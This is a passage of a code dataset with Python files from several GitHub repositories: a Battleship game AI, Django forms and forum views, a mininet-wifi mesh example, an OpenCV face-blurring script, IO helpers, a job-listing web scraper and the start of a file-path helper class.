    # method that builds the player's fleet\n    def ships_create(self):\n        # keep creating ships until there are 10 of them\n        ships_counter = 0\n        while ships_counter < 10:\n            # on a failed attempt, start over from scratch\n            self.ships = []\n            self.battlefield = [[0 for _ in range(10)] for _ in range(10)]\n            self.fleet_coord = []\n            ships_counter = 0\n            # loop over ship lengths\n            for length in range(4, 0, -1):\n                # the number of ships depends on the length\n                for i in range(5 - length):\n                    # number of attempts to create this ship\n                    try_number = 0\n                    while True:\n                        try_number += 1\n                        # try 50 times; if that fails, start over\n                        if try_number > 50:\n                            break\n                        # pick a random starting point and orientation\n                        start_point = (randrange(10), randrange(10))\n                        orientation = randrange(2)\n                        # create the ship and check that it does not cross the others\n                        ship = Ship(length, orientation, start_point)\n                        ships_crossing = list(set(self.fleet_coord) & set(ship.ship_coord))\n                        # if all went well, add the ship and its coordinates to the fleet and update the board\n                        if ship.correct_create and not ships_crossing:\n                            self.fleet_coord += ship.ship_coord + ship.ship_around\n                            self.ships.append(ship)\n                            ships_counter += 1\n                            self.battlefield_change(ship.ship_coord, 1)\n                            break\n\n    # shoot at the enemy: takes the target Player object and the shot coordinates;\n    # returns the shot status and the list of changed points\n    def shoot(self, enemy, coord):\n        # shot status (0 - miss, 1 - hit, 2 - kill)\n        shoot_status = 0\n        self.shoots.append(coord)\n        # check whether the shot coordinate belongs to any enemy ship\n        for ship in enemy.ships:\n            # on a hit, mark that deck of the ship as damaged\n            if coord in ship.ship_coord:\n                ship_peace_index = ship.ship_coord.index(coord)\n                ship.ship_status[ship_peace_index] = 0\n                # if intact decks remain, the result is \"hit\"\n                if 1 in ship.ship_status:\n                    shoot_status = 1\n                    enemy.battlefield[coord[0]][coord[1]] = 3\n                    return shoot_status, [coord]\n                # otherwise it is a \"kill\"; add the ship's surroundings to the shot list so we never aim there\n                else:\n                    shoot_status = 2\n                    ship.alive = False\n                    self.shoots += ship.ship_around\n                    enemy.battlefield[coord[0]][coord[1]] = 3\n                    enemy.battlefield_change(ship.ship_around, 2)\n                    return shoot_status, ship.ship_around\n        enemy.battlefield[coord[0]][coord[1]] = 2\n        return shoot_status, []\n\n    # loss check: returns True if any ships are still alive, otherwise False\n    def check_finish(self):\n        alive_counter = 0\n        for ship in self.ships:\n            if ship.alive:\n                alive_counter += 1\n        if alive_counter:\n            return True\n        return False\n\n\n
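# The AI below is a simple hunt/target strategy: fire at random unseen cells\n# until something is hit, then probe the four orthogonal neighbours, and once\n# two or more hits line up, extend that line from either end.\n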
# computer AI class, inherits from Player;\n# extends the player logic with shot point selection\nclass AIPlayer(Player):\n    def __init__(self):\n        super().__init__()\n        self.hits = [] # list of successful shots\n\n    # shot selection method, returns the coordinates to fire at\n    def coord_select(self):\n        # if there are no successful shots yet, pick a random point not fired at before\n        if not self.hits:\n            while True:\n                random_point = (randrange(10), randrange(10))\n                if random_point not in self.shoots:\n                    break\n        # if there was exactly one successful shot, randomly pick one of the 4 neighbouring points\n        elif len(self.hits) == 1:\n            neighbor_points = []\n            previous_point_row, previous_point_column = self.hits[0]\n            for i in range(previous_point_row - 1, previous_point_row + 2):\n                for j in range(previous_point_column - 1, previous_point_column + 2):\n                    if (0 <= i <= 9 and 0 <= j <= 9 and\n                            (i == previous_point_row or j == previous_point_column)\n                            and not (i == previous_point_row and j == previous_point_column)\n                            and ((i, j) not in self.shoots)):\n                        neighbor_points.append((i, j))\n            random_point = choice(neighbor_points)\n        else:\n            # with more than one successful shot, randomly pick one of the 2 end points\n            neighbor_points = []\n            # if the hits share a row, take the smallest column and consider the points to the left and right\n            if self.hits[0][0] == self.hits[1][0]:\n                min_column = min(list(zip(*self.hits))[1])\n                if min_column - 1 >= 0:\n                    neighbor_points.append((self.hits[0][0], min_column - 1))\n                if min_column + len(self.hits) <= 9:\n                    neighbor_points.append((self.hits[0][0], min_column + len(self.hits)))\n            # if they share a column, take the smallest row and consider the points above and below\n            else:\n                min_row = min(list(zip(*self.hits))[0])\n                if min_row - 1 >= 0:\n                    neighbor_points.append((min_row - 1, self.hits[0][1]))\n                if min_row + len(self.hits) <= 9:\n                    neighbor_points.append((min_row + len(self.hits), self.hits[0][1]))\n            while True:\n                random_point = choice(neighbor_points)\n                if random_point not in self.shoots:\n                    break\n        return random_point\n","repo_name":"TonyNewbie/Battleship","sub_path":"battleship_server/server/Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":8697,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"21724451450","text":"from django import forms\n\nfrom celery.execute import send_task\n\nfrom viperdb.models import Virus, Layer, Entity, Family\nfrom viperdb.helpers import get_pdb_info\n\n\n\n\n\nclass InitialVirusForm(forms.Form):\n    def __init__(self, *args, **kwargs):\n        kwargs.update({\"initial\":{\"file_source\": 1}})\n        super(InitialVirusForm, self).__init__(*args, **kwargs)\n        for key, field in self.fields.iteritems():\n            if field.required:\n                field.widget.attrs.update({'class':'required'})\n    FILE_REMOTE = 1\n    FILE_LOCAL = 2\n    FILE_UPLOAD = 3\n    FILE_SOURCE_CHOICES = ((FILE_REMOTE, 'Use up-to-date PDB and CIF files from RCSB'),\n                           (FILE_LOCAL, 'Use existing PDB and CIF files on VIPERdb'),)\n                           # (FILE_UPLOAD, 'Upload your own PDB and CIF files to VIPERdb'))\n    \n    entry_id = forms.CharField(max_length=8)\n    file_source = forms.ChoiceField(widget=forms.RadioSelect, choices=FILE_SOURCE_CHOICES)\n    # pdb_file_upload = forms.FileField(required=False)\n    # cif_file_upload = forms.FileField(required=False)\n\n
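    # clean() validates according to the selected source: remote ids are\n    # checked against RCSB via get_pdb_info, local ones via a blocking Celery\n    # task that counts the PDB/CIF files on disk.\n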
    def clean(self):\n        file_source = int(self.cleaned_data[\"file_source\"])\n        entry_id= self.cleaned_data[\"entry_id\"]\n\n        if file_source == self.FILE_REMOTE:\n            if not get_pdb_info(entry_id):\n                raise forms.ValidationError(\"PDB id does not exist in RCSB.\")\n        elif file_source == self.FILE_LOCAL:\n            task = send_task('virus.check_file_count', args=[entry_id])\n\n            if task.get() != 2: \n                raise forms.ValidationError(\"PDB and/or CIF file not found locally.\")\n        elif file_source == self.FILE_UPLOAD:\n            pass\n\n        return self.cleaned_data\n\n\nclass VirusForm(forms.ModelForm):\n\n    def __init__(self, *args, **kwargs):\n        super(VirusForm, self).__init__(*args, **kwargs)\n        self.fields[\"family\"].queryset = Family.objects.order_by('name')\n        self.fields[\"deposition_date\"] = forms.DateField(input_formats=[\"%m-%d-%Y\"]) \n        for key, field in self.fields.iteritems():\n            if field.required:\n                field.widget.attrs.update({'class':'required'})\n\n    class Meta:\n        model = Virus\n        widgets = {}\n        exclude = ['entry_key', 'prepared', 'layer_count']\n\n    def clean(self):\n        return self.cleaned_data\n\n\n\nclass LayerForm(forms.ModelForm):\n    def __init__(self, entry_key, *args, **kwargs):\n        super(LayerForm, self).__init__(*args, **kwargs)\n        self.fields['entities'] = forms.ModelMultipleChoiceField(\n            queryset=Entity.objects.filter(entry_key=entry_key, \n                                           type='polymer'),\n            widget=forms.CheckboxSelectMultiple,\n            )\n        for key, field in self.fields.iteritems():\n            if field.required:\n                field.widget.attrs.update({'class':'required'})\n\n    class Meta:\n        model = Layer\n        exclude = ['entry_key', 'layer_id', 'entry_id', \"min_diameter\", \"ave_diameter\", \"max_diameter\"]\n\n    def clean(self):\n        return self.cleaned_data\n\nclass MatrixChoiceForm(forms.Form):\n    MTX_VIPERIZE = 1\n    MTX_INPUT = 2\n    MTX_UNIT = 3\n    MATRIX_CHOICES = ((MTX_VIPERIZE,'Use viperize to generate PDB to VIPER matrix'),\n                      (MTX_INPUT, 'Input your own matrix'),\n                      (MTX_UNIT, 'Use Unit Matrix'))\n    \n    matrix_selection = forms.ChoiceField(widget=forms.RadioSelect, choices=MATRIX_CHOICES)\n\nclass ChainForm(forms.Form):\n    def __init__(self, *args, **kwargs):\n        kwargs.update({\"initial\":{\"chain_selection\": 1}})\n        kwargs.update({\"empty_permitted\":False})\n        super(ChainForm, self).__init__(*args,**kwargs)\n\n    chain_selection = forms.ChoiceField(widget=forms.RadioSelect, choices=Virus.CHAIN_CHOICES)\n    chain_input = forms.CharField(max_length=2, required=False)\n\nclass MoveChainForm(forms.Form):\n    def __init__(self, *args, **kwargs):\n        kwargs.update({\"initial\":{\"move_selection\": 1}})\n        super(MoveChainForm, self).__init__(*args, **kwargs)\n\n    MOVE_NONE = 1\n    MOVE_ALL = 2\n    move_choices = ((MOVE_NONE, \"Move none\"), (MOVE_ALL, \"Move all chains\"))\n    move_selection = forms.ChoiceField(widget=forms.RadioSelect, choices=move_choices)\n    matrix_selection = forms.IntegerField(min_value=1, max_value=60, required=False)\n\nclass ImageAnalysisForm(forms.Form):\n    def __init__(self, *args, **kwargs):\n        kwargs.update({\"initial\":{\"analysis_selection\": 1}})\n        super(ImageAnalysisForm, self).__init__(*args, **kwargs)\n\n    BOTH_IMAGE_AND_ANALYSIS = 1\n    ANALYSIS_ONLY = 2\n    IMAGE_ONLY = 3\n    NO_ACTION = 4\n\n    analysis_choices = (\n        (BOTH_IMAGE_AND_ANALYSIS, \"Perform analysis and generate images.\"),\n        (ANALYSIS_ONLY, \"Perform analysis only.\"),\n        (IMAGE_ONLY, \"Generate images only.\"),\n        (NO_ACTION, \"Do nothing.\")\n    )\n    analysis_selection = forms.ChoiceField(widget=forms.RadioSelect, \n                                           choices=analysis_choices)\n\n\n","repo_name":"TSRI/viperdb3","sub_path":"app/viperdb/forms/add_entry.py","file_name":"add_entry.py","file_ext":"py","file_size_in_byte":5030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
{"seq_id":"42161634898","text":"from db_factory import DB_Factory\n\ndb = DB_Factory()\n\n#raw_list_training = db.foulcommits_training_data()\ndatax = db.foulcommits_data()\ndatay = db.foulcommits_data_card()\n\n\n\n#print(str(raw_list_test[0]))\n\noutput = open('datax.txt', 'w')\nfor data in datax:\n    output.writelines(str(data))\n    output.write(\"\\n\")\noutput.close()\n\noutput2 = open('datay.txt', 'w')\nfor data in datay:\n    output2.writelines(str(data))\n    output2.write(\"\\n\")\noutput2.close()\n\n\n\n\ndb.close()","repo_name":"Eli-Anderson/SoccerHeatmap","sub_path":"backend/ml_pull_db_data.py","file_name":"ml_pull_db_data.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
{"seq_id":"42456485793","text":"#!/usr/bin/env python\n\n\"\"\"\nThis example shows how to enable mesh mode.\nThe wireless mesh network is based on IEEE 802.11s\n\"\"\"\n\nimport sys\n\nfrom mininet.log import setLogLevel, info\nfrom mn_wifi.link import wmediumd, mesh\nfrom mn_wifi.cli import CLI\nfrom mn_wifi.net import Mininet_wifi\nfrom mn_wifi.wmediumdConnector import interference\n\n\ndef topology(mobility):\n    \"Create a network.\"\n    net = Mininet_wifi(link=wmediumd, wmediumd_mode=interference)\n\n    info(\"*** Creating nodes\\n\")\n    if mobility:\n        sta1 = net.addStation('sta1')\n        sta2 = net.addStation('sta2')\n        sta3 = net.addStation('sta3')\n    else:\n        sta1 = net.addStation('sta1', position='10,10,0')\n        sta2 = net.addStation('sta2', position='50,10,0')\n        sta3 = net.addStation('sta3', position='90,10,0')\n\n    info(\"*** Configuring Propagation Model\\n\")\n    net.setPropagationModel(model=\"logDistance\", exp=4)\n\n    info(\"*** Configuring nodes\\n\")\n    net.configureNodes()\n\n    info(\"*** Creating links\\n\")\n
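    # All three stations join the same 802.11s mesh (ssid 'meshNet') on\n    # channel 5; ht_cap='HT40+' requests a 40 MHz HT channel.\n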
    net.addLink(sta1, cls=mesh, ssid='meshNet',\n                intf='sta1-wlan0', channel=5, ht_cap='HT40+') #, passwd='thisisreallysecret')\n    net.addLink(sta2, cls=mesh, ssid='meshNet',\n                intf='sta2-wlan0', channel=5, ht_cap='HT40+') #, passwd='thisisreallysecret')\n    net.addLink(sta3, cls=mesh, ssid='meshNet',\n                intf='sta3-wlan0', channel=5, ht_cap='HT40+') #, passwd='thisisreallysecret')\n\n    if mobility:\n        net.plotGraph(max_x=100, max_y=100)\n        net.setMobilityModel(time=0, model='RandomDirection',\n                             max_x=100, max_y=100,\n                             min_v=0.5, max_v=0.8, seed=20)\n\n    info(\"*** Starting network\\n\")\n    net.build()\n\n    info(\"*** Running CLI\\n\")\n    CLI(net)\n\n    info(\"*** Stopping network\\n\")\n    net.stop()\n\n\nif __name__ == '__main__':\n    setLogLevel('info')\n    mobility = True if '-m' in sys.argv else False\n    topology(mobility)\n","repo_name":"intrig-unicamp/mininet-wifi","sub_path":"examples/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":391,"dataset":"github-code","pt":"32"}
{"seq_id":"29589083308","text":"import cv2\r\n\r\ncascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\n\r\ndef find_and_blur(bw, color): \r\n    # detect all faces\r\n    faces = cascade.detectMultiScale(bw, 1.1, 4)\r\n    # get the locations of the faces\r\n    for (x, y, w, h) in faces:\r\n        # select the areas where the face was found\r\n        roi_color = color[y:y+h, x:x+w]\r\n        # blur the colored image\r\n        blur = cv2.GaussianBlur(roi_color, (101,101), 0)\r\n        # Insert ROI back into image\r\n        color[y:y+h, x:x+w] = blur \r\n    \r\n    # return the blurred image\r\n    return color\r\n\r\n# load the input image\r\nimage_capture = cv2.imread('test.jpg')\r\n\r\nwhile True:\r\n    # transform color -> grayscale\r\n    bw = cv2.cvtColor(image_capture, cv2.COLOR_BGR2GRAY)\r\n    # detect the face and blur it\r\n    blur = find_and_blur(bw, image_capture)\r\n    # display the blur output\r\n    cv2.imshow('Image', blur)\r\n    # break if q is pressed\r\n    if cv2.waitKey(1) & 0xFF == ord('q'):\r\n        break\r\n\r\n# close the display window\r\ncv2.destroyAllWindows()\r\n    ","repo_name":"ADITYANMOHANTY/FACE-BLUR-SYSTEM-USING-OPENCV-PYTHON","sub_path":"blur.py","file_name":"blur.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"17617636428","text":"\"\"\"Basic IO utils.\n\"\"\"\n\nimport os\nimport ujson as json\nimport cPickle as pickle\n\ndef create_path(path):\n    dirname = os.path.dirname(path)\n    if not os.path.isdir(dirname):\n        os.makedirs(dirname)\n\ndef read_json(path):\n    try:\n        return json.load(open(path))\n    except:\n        raise Exception('Error reading JSON from %s' % path)\n\ndef write_json(raw, path, ensure_path=False):\n    if ensure_path:\n        create_path(path)\n    with open(path, 'w') as out:\n        print >>out, json.dumps(raw)\n\ndef read_pickle(path):\n    with open(path, 'rb') as fin:\n        return pickle.load(fin)\n\ndef write_pickle(obj, path, ensure_path=False):\n    if ensure_path:\n        create_path(path)\n    with open(path, 'wb') as fout:\n        pickle.dump(obj, fout)\n\n","repo_name":"stanfordnlp/cocoa","sub_path":"cocoa/io/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"32"}
{"seq_id":"11860912863","text":"#from _typeshed import Self\nfrom django import db\nfrom django.shortcuts import render\nfrom .models import Forum_post, Home_page\nfrom .forms import FilterForm\nfrom django.db.models 
import Q\nfrom django.core.paginator import Paginator\nfrom django.contrib import messages\nfrom django.urls import reverse_lazy\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.generic import (\n #ListView,\n DetailView,\n CreateView,\n UpdateView,\n DeleteView,\n)\n\n\ndef home(request):\n if request.user.is_authenticated:\n items_in_page_tmp = request.user.profile.items_in_page\n db_data = Home_page.objects.all().order_by('-date_posted')\n else:\n items_in_page_tmp = 10\n db_data = Home_page.objects.filter(public_post = True).order_by('-date_posted')\n if items_in_page_tmp > 0:\n items_in_page_int = items_in_page_tmp\n else:\n items_in_page_int = 1\n if items_in_page_tmp > 50:\n items_in_page_int = 50\n paginator = Paginator(db_data, items_in_page_int)\n page_number = request.GET.get('page')\n page_data = paginator.get_page(page_number)\n dic_x = {\n 'title': 'Home',\n 'title_page': 'Simple message board',\n 'posts': page_data\n }\n return render(request, 'forum/home.html', dic_x)\n\n\n@login_required\ndef index(request):\n dic_x = {}\n filter_url_tmp = ''\n filter_url = ''\n filter_url_org = request.get_full_path()\n position = filter_url_org.rfind('?')\n filter_url_org1 = '&' + filter_url_org[position:]\n if request.user.is_authenticated:\n filter_tmp = request.GET.get('title_filter')\n if filter_tmp != None:\n filter_str = filter_tmp\n filter_url_tmp = (filter_url_org1.replace('?', ''))\n position2 = filter_url_tmp.rfind('&')\n if position > 0:\n filter_url = filter_url_tmp[position2:]\n else:\n filter_url = filter_url_tmp\n else:\n filter_str = ''\n filter_obj = FilterForm(request.GET or None)\n list_rows_tmp = request.user.profile.list_rows\n if list_rows_tmp > 0:\n list_rows_int = list_rows_tmp\n else:\n list_rows_int = 1\n if list_rows_tmp > 100:\n list_rows_int = 100\n db_data = Forum_post.objects.filter(title__icontains = filter_str).order_by('-date_posted')\n paginator = Paginator(db_data, list_rows_int)\n page_number = request.GET.get('page')\n page_data = paginator.get_page(page_number)\n dic_x = {\n 'title': 'Forum index',\n 'title_page': 'Simple message board',\n 'posts': page_data,\n 'filter': filter_obj,\n 'filter_url_str' : filter_url\n }\n return render(request, 'forum/index.html', dic_x)\n\n\n@login_required\ndef latest_topics(request):\n items_in_page_tmp = request.user.profile.items_in_page\n if items_in_page_tmp > 0:\n items_in_page_int = items_in_page_tmp\n else:\n items_in_page_int = 1\n if items_in_page_tmp > 50:\n items_in_page_int = 50\n db_data = Forum_post.objects.filter(origin_post_id = 0).order_by('-date_posted')\n paginator = Paginator(db_data, items_in_page_int)\n page_number = request.GET.get('page')\n page_data = paginator.get_page(page_number)\n dic_x = {\n 'title': 'Forum latest topics',\n 'title_page' : 'Simple message board',\n 'posts': page_data\n }\n return render(request, 'forum/itemview.html', dic_x)\n\n\n@login_required\ndef latest_comments(request):\n items_in_page_tmp = request.user.profile.items_in_page\n if items_in_page_tmp > 0:\n items_in_page_int = items_in_page_tmp\n else:\n items_in_page_int = 1\n if items_in_page_tmp > 50:\n items_in_page_int = 50\n db_data = Forum_post.objects.exclude(origin_post_id = 0).order_by('-date_posted')\n paginator = Paginator(db_data, items_in_page_int)\n page_number = request.GET.get('page')\n page_data = paginator.get_page(page_number)\n dic_x = {\n 'title': 'Forum latest comments',\n 
'title_page': 'Simple message board',\n 'posts': page_data\n }\n return render(request, 'forum/itemview.html', dic_x)\n\n\n@login_required\ndef latest_all(request):\n items_in_page_tmp = request.user.profile.items_in_page\n if items_in_page_tmp > 0:\n items_in_page_int = items_in_page_tmp\n else:\n items_in_page_int = 1\n if items_in_page_tmp > 50:\n items_in_page_int = 50\n db_data = Forum_post.objects.all().order_by('-date_posted')\n paginator = Paginator(db_data, items_in_page_int)\n page_number = request.GET.get('page')\n page_data = paginator.get_page(page_number)\n dic_x = {\n 'title': 'Forum latest all',\n 'title_page': 'Simple message board',\n 'posts': page_data\n }\n return render(request, 'forum/itemview.html', dic_x)\n\n\nclass AllDetailView(LoginRequiredMixin, DetailView): #Show one post\n model = Forum_post\n template_name = 'forum/oneview.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Forum one post'\n context['title_page'] = 'Simple message board'\n return context\n\n\nclass ThreadDetailView(LoginRequiredMixin, DetailView): #Show post thread\n model = Forum_post\n template_name = 'forum/itemview.html'\n\n def get_context_data(self, **kwargs):\n items_in_page_tmp = self.request.user.profile.items_in_page\n if items_in_page_tmp > 0:\n items_in_page_int = items_in_page_tmp\n else:\n items_in_page_int = 1\n if items_in_page_tmp > 50:\n items_in_page_int = 50\n context = super().get_context_data(**kwargs)\n db_data = Forum_post.objects.all().values().get(pk=self.kwargs.get('pk'))\n if db_data['origin_post_id'] == 0:\n post_id = db_data['id']\n else:\n post_id = db_data['origin_post_id']\n db_data = Forum_post.objects.filter(Q(id = post_id) | Q(origin_post_id = post_id)).order_by('date_posted')\n paginator = Paginator(db_data, items_in_page_int)\n page_number = self.request.GET.get('page')\n page_data = paginator.get_page(page_number)\n context['posts'] = page_data\n context['title'] = 'Forum message thread'\n context['title_page'] = 'Simple message board'\n return context\n\n\nclass UserDetailView(LoginRequiredMixin, DetailView): #Show selected user information\n model = Forum_post\n template_name = 'forum/user_info.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'User info'\n return context\n\n\nclass UserHomeDetailView(LoginRequiredMixin, DetailView): #Show selected home user information\n model = Home_page\n template_name = 'forum/user_info.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Forum user info'\n context['title_page'] = 'Simple message board'\n return context\n\n\nclass TopicCreateView(LoginRequiredMixin, CreateView):\n model = Forum_post\n success_url = reverse_lazy('forum-latest_topics')\n fields = ['title', 'content']\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Forum new topic'\n context['title_page'] = 'Simple message board'\n return context\n\n def get_template_names(self):\n if self.request.user.profile.user_level > 3:\n template_name = 'forum/topic_new.html'\n else:\n template_name = 'forum/forbidden.html'\n return template_name\n\n def form_valid(self, form):\n form.instance.author = self.request.user\n form.instance.author_name = str(self.request.user)\n form.instance.author_nickname = self.request.user.profile.nickname\n form.instance.post_type = 'Topic'\n 
messages.add_message(self.request, messages.INFO, 'Your new topic has been saved!')\n        return super().form_valid(form)\n\n\nclass CommentCreateView(LoginRequiredMixin, CreateView):\n    model = Forum_post\n    success_url = reverse_lazy('forum-latest_comments')\n    fields = ['content']\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['topic_context'] = Forum_post.objects.all().values().get(pk=self.kwargs.get('pk'))\n        context['title'] = 'Forum new comment'\n        context['title_page'] = 'Simple message board'\n        return context\n\n    def get_template_names(self):\n        if self.request.user.profile.user_level > 3:\n            template_name = 'forum/comment_new.html'\n        else:\n            template_name = 'forum/forbidden.html'\n        return template_name\n\n    def form_valid(self, form):\n        db_data = Forum_post.objects.all().values().get(pk=self.kwargs.get('pk'))\n        form.instance.author = self.request.user\n        form.instance.author_name = str(self.request.user)\n        form.instance.author_nickname = self.request.user.profile.nickname\n        form.instance.post_type = 'Comment'\n        form.instance.title = 'Re: ' + db_data['title']\n        if db_data['origin_post_id'] == 0:\n            form.instance.origin_post_id = db_data['id']\n        else:\n            form.instance.origin_post_id = db_data['origin_post_id']\n        info = 'Your new comment to '+ db_data['title']+ ' has been saved!'\n        messages.add_message(self.request, messages.INFO, info)\n        return super().form_valid(form)\n\n\nclass PostUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):\n    model = Forum_post\n    success_url = reverse_lazy('forum-latest_all')\n    fields = ['content']\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['title'] = 'Forum edit post'\n        context['title_page'] = 'Simple message board'\n        return context\n\n    def get_template_names(self):\n        if self.request.user.profile.user_level > 3:\n            template_name = 'forum/edit_all.html'\n        else:\n            template_name = 'forum/forbidden.html'\n        return template_name\n\n    def form_valid(self, form):\n        form.instance.author = self.request.user\n        db_data = Forum_post.objects.all().values().get(pk=self.kwargs.get('pk'))\n        origin_post_id = db_data['origin_post_id']\n        if origin_post_id == 0:\n            form.instance.post_type = 'Topic[edit]'\n        else:\n            form.instance.post_type = 'Comment[edit]' \n        info = 'Post '+ db_data['title']+ ' has been updated!'\n        messages.add_message(self.request, messages.INFO, info)\n        return super().form_valid(form)\n\n    def test_func(self):\n        post = self.get_object()\n        if self.request.user == post.author:\n            return True\n        return False\n\n\nclass PostDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):\n    model = Forum_post\n    success_url = reverse_lazy('forum-latest_all')\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['title'] = 'Forum delete post'\n        context['title_page'] = 'Simple message board'\n        return context\n\n    def test_func(self):\n        post = self.get_object()\n        if self.request.user == post.author and self.request.user.profile.user_level > 4:\n            return True\n        return False ","repo_name":"hann1010/simple_message_board","sub_path":"forum/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11584,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
{"seq_id":"20829133441","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb  6 13:44:03 2023\r\n\r\n@author: Vighneshwar\r\n\"\"\"\r\n\r\nimport requests \r\n
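# webdriver_manager downloads a chromedriver build matching the installed\r\n# Chrome and returns its path, so no manual driver installation is needed.\r\n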
webdriver\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\nimport pandas as pd\r\n\r\nfrom webdriver_manager.chrome import ChromeDriverManager\r\n\r\n\r\nurl = \"https://www.naukri.com/tableau-jobs?k=tableau&ctcFilter=25to50&ctcFilter=50to75\"\r\npage = requests.get(url)\r\npage.text\r\n\r\ndriver = webdriver.Chrome(ChromeDriverManager().install())\r\ndriver.get(url)\r\n\r\ntime.sleep(10)\r\n\r\nsoup = BeautifulSoup(driver.page_source,'html5lib')\r\n\r\ndriver.close()  # call close(); the bare attribute reference was a no-op\r\n\r\noutput_dataframe = pd.DataFrame(columns=['Title','Company','Ratings','Reviews',\r\n                                         'Experience','Salary','Location',\r\n                                         'Job_Post_History','URL'])\r\nresults = soup.find(class_ =\"list\")\r\njob_elements = results.find_all('article',class_ = 'jobTuple')\r\n\r\n\r\nfor job_elem in job_elements:\r\n    #URL for the job\r\n    URL = job_elem.find('a',class_='title ellipsis').get('href')\r\n    \r\n    #Title of the job \r\n    Title = job_elem.find('a',class_= 'title ellipsis').text\r\n    \r\n    \r\n    #name of the company \r\n    Company = job_elem.find('a',class_= 'subTitle ellipsis fleft').text\r\n    \r\n    #print(Company)\r\n    \r\n    #Salary offered\r\n    salary_offered_li= job_elem.find('li',class_='fleft br2 placeHolderLi salary')\r\n    salary_offered_span = salary_offered_li.find('span',class_='ellipsis fleft ')\r\n    if salary_offered_span is None:\r\n        continue\r\n    else:\r\n        salary_offered = salary_offered_span.text\r\n    #Rating\r\n    rating_span = job_elem.find('span',class_='starRating fleft dot')\r\n    if rating_span is None:\r\n        Ratings= \"\"\r\n        \r\n    else:\r\n        Ratings = rating_span.text\r\n    \r\n    #Years of experience required \r\n    Years_of_exp_span = job_elem.find('span',class_ = 'ellipsis fleft expwdth')\r\n    if Years_of_exp_span is None:\r\n        Years_of_exp = \"\"\r\n    else:\r\n        Years_of_exp = Years_of_exp_span.text\r\n    \r\n    \r\n    #location \r\n    location_li= job_elem.find('li',class_='fleft br2 placeHolderLi location')\r\n    location_span = location_li.find('span',class_='ellipsis fleft locWdth')\r\n    if location_span is None:\r\n        location=\"\"\r\n    else:\r\n        location = location_span.text\r\n    \r\n    #no of days since posted\r\n    post_date_span= job_elem.find('span',class_ = 'fleft postedDate')\r\n    if post_date_span is None:\r\n        posted_date = \"\"\r\n    else:\r\n        posted_date = post_date_span.text\r\n    \r\n    #append to data frame\r\n    output_dataframe = output_dataframe.append({'URL':URL,'Title': Title,'Company':Company,'Ratings':Ratings,'Reviews':\"\",'Experience':Years_of_exp,'Salary':salary_offered,'Location':location,'Job_Post_History':posted_date}, ignore_index = True)\r\n    print(output_dataframe)","repo_name":"jaiswalvighneshwar/Scraping-job-portal-data-using-python","sub_path":"job_portal_scrapper.py","file_name":"job_portal_scrapper.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10516329628","text":"\"\"\"Fpaths API.\"\"\"\n# %% codecell\nfrom pathlib import Path\n\nimport pandas as pd\n\ntry:\n    from scripts.dev.multiuse.help_class import baseDir\n    from scripts.dev.multiuse.path_helpers import get_most_recent_fpath\nexcept ModuleNotFoundError:\n    from multiuse.help_class import baseDir\n    from multiuse.path_helpers import get_most_recent_fpath\n\n# %% codecell\n\n\nclass FpathsAPI():\n    \"\"\"Get and return fpath for each API function.\"\"\"\n\n    key_dict = {}\n\n    def __init__(self, keyword, origin, **kwargs):\n        key = f\"{origin}_{keyword}\"\n\n        self._ref_data_fpath(self, **kwargs)\n        self._iex_hist_fpath(self, **kwargs)\n        self._ml_fpath(self, **kwargs)\n\n        
self.fpath = self.key_dict[key]\n\n @classmethod\n def _ref_data_fpath(cls, self, **kwargs):\n \"\"\"Get ref data fpaths.\"\"\"\n gs_path = Path(baseDir().path, 'errors/gz_sizes.parquet')\n ref_dict = ({\n 'get_sizes': gs_path,\n 'data_files_sizes': Path(baseDir().path, 'logs', 'file_sizes.txt'),\n })\n\n pre = 'ref_data'\n ref_dict = {f\"{pre}_{k}\": v for k, v in ref_dict.items()}\n self.key_dict = self.key_dict | ref_dict\n\n @classmethod\n def _iex_hist_fpath(cls, self, **kwargs):\n \"\"\"Iex historical data fpaths.\"\"\"\n bdir = Path(baseDir().path, 'StockEOD/combined')\n\n # 'all' is misleading - this is really just the most recent\n # combined version. Whereas 'cb_all' is all combined stock data\n iex_hdict = ({\n 'all': get_most_recent_fpath(bdir),\n 'cb_all': (get_most_recent_fpath(\n bdir.parent.joinpath(bdir.stem + '_all')))\n })\n\n pre = 'iex_hist'\n iex_hdict = {f\"{pre}_{k}\": v for k, v in iex_hdict.items()}\n self.key_dict = self.key_dict | iex_hdict\n\n @classmethod\n def _ml_fpath(cls, self, **kwargs):\n \"\"\"Fpaths for machine learning files.\"\"\"\n bdir = Path(baseDir().path, 'ml_data', 'ml_training')\n\n 